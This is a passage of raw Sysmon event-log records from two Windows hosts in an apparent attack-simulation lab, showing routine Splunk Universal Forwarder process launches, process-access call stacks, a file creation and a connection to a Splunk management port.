Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018803Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.847{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018802Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.847{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E665-63C7-3D02-00000000B002}3592C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018801Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.848{E5A8D418-E665-63C7-3D02-00000000B002}3592C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018800Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.576{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=73FCC4A910A2ABA0B9907479970C2864,SHA256=0CA749B58A8536A924C72C1D89D99F475D60F692CE00E27BE6AA981CBEEED1F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018799Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.192{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E665-63C7-3C02-00000000B002}2276C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018798Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.192{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018797Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.192{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018796Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.192{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018795Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.192{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018794Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.192{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018793Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.192{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018792Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.192{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018791Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.192{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018790Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.192{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018789Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.192{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E665-63C7-3C02-00000000B002}2276C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018788Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.192{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E665-63C7-3C02-00000000B002}2276C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018787Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.193{E5A8D418-E665-63C7-3C02-00000000B002}2276C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000047668Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:29.823{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047667Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:29.823{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047666Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:29.823{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047665Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:29.823{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047664Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:29.823{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E665-63C7-9406-00000000AF02}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000047663Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:29.823{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E665-63C7-9406-00000000AF02}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000047662Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:29.699{FE4C2B44-E665-63C7-9406-00000000AF02}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000047661Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.262{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56483-false10.0.1.12-8089- 10341000x800000000000000047660Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:29.022{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E664-63C7-9306-00000000AF02}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047659Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:29.022{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047658Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 